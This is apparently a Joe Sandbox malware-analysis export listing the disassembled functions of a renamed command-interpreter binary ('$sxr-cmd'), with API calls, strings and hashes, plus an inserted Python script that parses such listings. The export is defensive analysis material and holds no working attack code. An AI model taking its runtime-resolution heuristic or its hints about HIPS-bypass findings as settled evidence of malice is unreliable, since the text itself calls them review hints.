                                                                                                                        • Part of subcall function 00007FF6155058E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF61551C6DB), ref: 00007FF6155058EF
                                                                                                                      • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615504DBB
                                                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF615504DCA
                                                                                                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615504DE0
                                                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF615504DEE
                                                                                                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615504E04
                                                                                                                        • Part of subcall function 00007FF615500580: _get_osfhandle.MSVCRT ref: 00007FF615500589
                                                                                                                        • Part of subcall function 00007FF615500580: SetConsoleMode.KERNELBASE ref: 00007FF61550059E
                                                                                                                        • Part of subcall function 00007FF615500580: _get_osfhandle.MSVCRT ref: 00007FF6155005AF
                                                                                                                        • Part of subcall function 00007FF615500580: GetConsoleMode.KERNELBASE ref: 00007FF6155005C5
                                                                                                                        • Part of subcall function 00007FF615500580: _get_osfhandle.MSVCRT ref: 00007FF6155005EF
                                                                                                                        • Part of subcall function 00007FF615500580: GetConsoleMode.KERNELBASE ref: 00007FF615500605
                                                                                                                        • Part of subcall function 00007FF615500580: _get_osfhandle.MSVCRT ref: 00007FF615500632
                                                                                                                        • Part of subcall function 00007FF615500580: SetConsoleMode.KERNELBASE ref: 00007FF615500647
                                                                                                                        • Part of subcall function 00007FF615504A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6155049F1), ref: 00007FF615504A28
                                                                                                                        • Part of subcall function 00007FF615504A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6155049F1), ref: 00007FF615504A66
                                                                                                                        • Part of subcall function 00007FF615504A14: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6155049F1), ref: 00007FF615504A7D
                                                                                                                        • Part of subcall function 00007FF615504A14: memmove.MSVCRT(?,?,00000000,00007FF6155049F1), ref: 00007FF615504A9A
                                                                                                                        • Part of subcall function 00007FF615504A14: RtlFreeHeap.NTDLL(?,?,00000000,00007FF6155049F1), ref: 00007FF615504AA2
                                                                                                                        • Part of subcall function 00007FF615504AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154F8798), ref: 00007FF615504AD6
                                                                                                                        • Part of subcall function 00007FF615504AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154F8798), ref: 00007FF615504AEF
                                                                                                                        • Part of subcall function 00007FF615505554: RegOpenKeyExW.ADVAPI32(?,00000000,?,00000001,?,00007FF615504E35), ref: 00007FF6155055DA
                                                                                                                        • Part of subcall function 00007FF615505554: RegQueryValueExW.ADVAPI32 ref: 00007FF615505623
                                                                                                                        • Part of subcall function 00007FF615505554: RegQueryValueExW.ADVAPI32 ref: 00007FF615505667
                                                                                                                        • Part of subcall function 00007FF615505554: RegQueryValueExW.ADVAPI32 ref: 00007FF6155056BE
                                                                                                                        • Part of subcall function 00007FF615505554: RegQueryValueExW.ADVAPI32 ref: 00007FF615505702
                                                                                                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615504E35
                                                                                                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615504E81
                                                                                                                      • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615504F69
                                                                                                                      • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615504F95
                                                                                                                      • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615504FB0
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615504FC1
                                                                                                                      • RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615504FD8
                                                                                                                      • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615504FF8
                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615505037
                                                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF61550504B
                                                                                                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6155050DF
                                                                                                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6155050F2
                                                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF61550510F
                                                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615505130
                                                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF61550514A
                                                                                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF615505175
                                                                                                                        • Part of subcall function 00007FF615503578: _get_osfhandle.MSVCRT ref: 00007FF615503584
                                                                                                                        • Part of subcall function 00007FF615503578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF61550359C
                                                                                                                        • Part of subcall function 00007FF615503578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035C3
                                                                                                                        • Part of subcall function 00007FF615503578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035D9
                                                                                                                        • Part of subcall function 00007FF615503578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035ED
                                                                                                                        • Part of subcall function 00007FF615503578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF615503602
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Console$HeapMode_get_osfhandle$QueryValue$AddressHandleProcProcess$AllocateCommandCriticalFreeInfoLineLockSectionShared$AcquireAllocBufferCtrlDirectoryEnterEnvironmentFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenStringsTitleTypeWindowsmemmove
                                                                                                                      • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                                      • API String ID: 2297636897-3021193919
                                                                                                                      • Opcode ID: 536be2111ed0953f3dee75fce9ce1c38d128c8596e8c6e30d0a1bc8c68bb0d9c
                                                                                                                      • Instruction ID: 97a781302d386e14fb73634bae7fd0adece471595a06d91dae2b6c71e2a04477
                                                                                                                      • Opcode Fuzzy Hash: 536be2111ed0953f3dee75fce9ce1c38d128c8596e8c6e30d0a1bc8c68bb0d9c
                                                                                                                      • Instruction Fuzzy Hash: 51C13E29A09E42D6EA049B21E8141B9FBA1FF89FB5F458135D94EC77B1EF3CAD458300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%
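The listing above is the per-function format Joe Sandbox uses for its disassembly export: direct calls as "API.Module(args), ref: addr", calls made inside a callee as "Part of subcall function X: ...", and the strings the function references joined with "$" on the "String ID" line. The parser below is an added example, not part of the Joe Sandbox report or its tooling; SAMPLE is copied from the listing above, the regular expressions are this example's reading of that format, and the "runtime_resolved" heuristic (export names found in the string table of a function that also calls GetProcAddress) is the example's own way of surfacing at function level what the report's "Contains functionality to dynamically determine API calls" signature reports globally.

```python
"""Parse Joe Sandbox per-function API listings into a triage summary.

Added example: not part of the Joe Sandbox report.  SAMPLE is copied from
the listing above; the 'runtime_resolved' heuristic is this example's own.
"""
import re
from collections import Counter

# "API.Module(args), ref: addr"  or  "API.Module ref: addr" (no args shown).
DIRECT_RE = re.compile(
    r"^(?:•\s*)?(?P<api>[^.\s]+)\.(?P<module>[^\s(]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Call made inside a callee; Joe Sandbox attributes it to the callee's start address.
SUBCALL_RE = re.compile(
    r"^(?:•\s*)?Part of subcall function (?P<func>[0-9A-Fa-f]+):\s*(?P<rest>.+)$"
)
STRING_ID_RE = re.compile(r"^(?:•\s*)?String ID:\s*(?P<ids>.*)$")

# Constructed input: lines copied from the function listing above.
SAMPLE = """\
• Part of subcall function 00007FF615504AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154F8798), ref: 00007FF615504AD6
• Part of subcall function 00007FF615504AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154F8798), ref: 00007FF615504AEF
• Part of subcall function 00007FF615505554: RegOpenKeyExW.ADVAPI32(?,00000000,?,00000001,?,00007FF615504E35), ref: 00007FF6155055DA
• Part of subcall function 00007FF615505554: RegQueryValueExW.ADVAPI32 ref: 00007FF615505623
• GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615504E35
• GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6155050F2
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF61550510F
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615505130
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF61550514A
• ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF615505175
• String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
"""


def parse_call(line):
    """Return (api, module, ref, concrete_args) or None for a non-call line.

    '?' marks an argument the analyser could not recover; only literal
    values (typically constants or return addresses) are kept.
    """
    m = DIRECT_RE.match(line.strip())
    if not m:
        return None
    args = m.group("args") or ""
    concrete = [a for a in args.split(",") if a and a != "?"]
    return m.group("api"), m.group("module"), m.group("ref"), concrete


def summarize_listing(text):
    """Split one function's listing into direct calls, subcall calls and strings."""
    direct, subcalls, strings = [], {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        sm = SUBCALL_RE.match(line)
        if sm:
            call = parse_call(sm.group("rest"))
            if call:
                subcalls.setdefault(sm.group("func"), []).append(call)
            continue
        im = STRING_ID_RE.match(line)
        if im:
            # Joe Sandbox joins the referenced strings with '$'.  A string that
            # itself contains '$' (the $P$G prompt default further down this
            # report) cannot be split back unambiguously; pieces are kept as is.
            strings.extend(s for s in im.group("ids").split("$") if s)
            continue
        call = parse_call(line)
        if call:
            direct.append(call)
    counts = Counter(api for api, _, _, _ in direct)
    # Heuristic (this example's own): export names in the string table of a
    # function that calls GetProcAddress are probably resolved at run time
    # rather than through the import table.  A review hint, not a verdict:
    # legitimate startup code does this too, so check the image it lives in.
    runtime_resolved = []
    if counts.get("GetProcAddress"):
        runtime_resolved = sorted(s for s in strings if "." not in s)
    return {
        "direct": direct,
        "direct_counts": counts,
        "subcalls": subcalls,
        "strings": strings,
        "runtime_resolved": runtime_resolved,
    }


if __name__ == "__main__":
    summary = summarize_listing(SAMPLE)
    for api, n in summary["direct_counts"].most_common():
        print(f"{n:2d}  {api}")
    print("resolved at run time:", ", ".join(summary["runtime_resolved"]))
```

On this record the hint fires for CopyFileExW, IsDebuggerPresent and SetConsoleInputExeNameW, which is exactly the GetModuleHandleW plus three GetProcAddress calls visible above. The strings in the following records (CMD.EXE, COMSPEC, PATHEXT, \CMD.EXE) indicate that the dumped image is a command-interpreter binary, so the hit here should be read together with the report's HIPS-bypass findings about renamed and relocated system binaries rather than as evidence of malicious code in this function on its own.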

                                                                                                                      Control-flow Graph

                                                                                                                       [graph data omitted] Function 7ff615503c24: nodes call GetCurrentDirectoryW, towupper, iswalpha, GetFullPathNameW, GetFileAttributesW, SetCurrentDirectoryW, GetLastError and _local_unwind; the executed / not-executed node colouring is not recoverable from the text.
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                                                      • String ID: :
                                                                                                                      • API String ID: 1809961153-336475711
                                                                                                                      • Opcode ID: 08f7fbc338d514c2623eaeff65c67fab43d8a38d389f6037346b48594c1f00c7
                                                                                                                      • Instruction ID: 2e84282b262a4cc8c3b14f6c53fe7c21deb96a8e5d18a7cf85c5629f69be6de6
                                                                                                                      • Opcode Fuzzy Hash: 08f7fbc338d514c2623eaeff65c67fab43d8a38d389f6037346b48594c1f00c7
                                                                                                                      • Instruction Fuzzy Hash: 64D15C2A60CF85D2EA209B15E4542BAF7A1FB85F64F454236DA4EC36B5EF3CE944C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                       [graph data omitted] Function 7ff615502394: nodes call memset, GetModuleFileNameW, _wcsupr, wcschr, wcsrchr, _wcsicmp and free; the executed / not-executed node colouring is not recoverable from the text.
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprfreewcschr
                                                                                                                      • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                                      • API String ID: 318233705-4197029667
                                                                                                                      • Opcode ID: 3fac042061c3c259f4f053ca2a9c67aff2e597e23252bd33948ed1b3656da57f
                                                                                                                      • Instruction ID: 2f775aeba4cc815e12ccbc6696c10ac7e7c31021b79f1fc58b5f315693c8ce8e
                                                                                                                      • Opcode Fuzzy Hash: 3fac042061c3c259f4f053ca2a9c67aff2e597e23252bd33948ed1b3656da57f
                                                                                                                      • Instruction Fuzzy Hash: FD914C7AB09E82C5EE259B60D8502B9A7A1FF48FA8F544136C94EC76B5DF3CE9058700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleMode_get_osfhandle
                                                                                                                      • String ID: CMD.EXE
                                                                                                                      • API String ID: 1606018815-3025314500
                                                                                                                      • Opcode ID: 3e686ae0276ad7ff8a78bb3c5d2715100bc0f58041da1ae85f5dc5c67167e71d
                                                                                                                      • Instruction ID: 6c9843fea481ef5d1aba046070d816e438ed1534b20a4149ee100e1a56b56fa0
                                                                                                                      • Opcode Fuzzy Hash: 3e686ae0276ad7ff8a78bb3c5d2715100bc0f58041da1ae85f5dc5c67167e71d
                                                                                                                      • Instruction Fuzzy Hash: 3A41DE39A09E42CBE7548B25E855178BBA1BF89F75F558179C90EC3371DF3CA8148740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                       [graph data omitted] Function 7ff6154fc620: nodes call GetConsoleTitleW, GetLastError, towupper, SetConsoleTitleW, wcsncmp and wcschr; the executed / not-executed node colouring is not recoverable from the text.
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleTitlewcschr
                                                                                                                      • String ID: /$:$C:\Windows
                                                                                                                      • API String ID: 2364928044-2365244837
                                                                                                                      • Opcode ID: 5be3b52e050be901e413cad103f4228bc73007883b0d085a4ae858b48071e86f
                                                                                                                      • Instruction ID: 9afb0da88b59da8581de54fec2bb660caa9c198dd2d7e76d83625080bd12e683
                                                                                                                      • Opcode Fuzzy Hash: 5be3b52e050be901e413cad103f4228bc73007883b0d085a4ae858b48071e86f
                                                                                                                      • Instruction Fuzzy Hash: 90C18C65A0CE4282EA649B2DE4146B9E2A1EF81FB4F459132D91EC72F5EF3CEC54C704
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      Control-flow graph (figure; node and edge list omitted): entry block 7ff615508d80; blocks in this function call Sleep, _amsg_exit, _initterm, exit and _cexit.
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4291973834-0
                                                                                                                      • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                                      • Instruction ID: 185d2d96a5efd87cca98b64283d554c0954cfed03166cce1582965564f30eb76
                                                                                                                      • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                                      • Instruction Fuzzy Hash: 9441D129A08E43C6FB609B21E940679A3A0AF54FA8F140436DA1DC7AB1DF7CEC458740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      Control-flow graph (figure; node and edge list omitted): entry block 7ff6154f89c0; blocks in this function call memset, GetDriveTypeW, GetVolumeInformationW, GetLastError and ??_V@YAXPEAX@Z (operator delete[]).
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 850181435-0
                                                                                                                      • Opcode ID: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
                                                                                                                      • Instruction ID: 5e42555abe09a5b70b44d68fb2c5f699ded8d4526c8c06f9d4248b15f0452a6a
                                                                                                                      • Opcode Fuzzy Hash: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
                                                                                                                      • Instruction Fuzzy Hash: 30418F36A08FD1C9EB608F24D8442EDB7A4FB89F64F554126DA4D8BB68CF38D955C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      Control-flow graph (figure; node and edge list omitted): entry block 7ff615504a14; blocks in this function call GetEnvironmentStringsW, GetProcessHeap, RtlAllocateHeap, memmove and RtlFreeHeap.
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$AllocateEnvironmentFreeProcessStringsmemmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2247642577-0
                                                                                                                      • Opcode ID: 802b6fabda809232f6ce418b0fbabebe6d7003abc813b1358966284b18434ee4
                                                                                                                      • Instruction ID: 9b803e2876d83077d371ed9e94b4376a9a5af612e897382477d80f1dcc7b7ff4
                                                                                                                      • Opcode Fuzzy Hash: 802b6fabda809232f6ce418b0fbabebe6d7003abc813b1358966284b18434ee4
                                                                                                                      • Instruction Fuzzy Hash: 7C11A32AA15F92C2DE109B11B41403DFBA1FB89FA4B499035DE4E83B65DF3DEC418740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
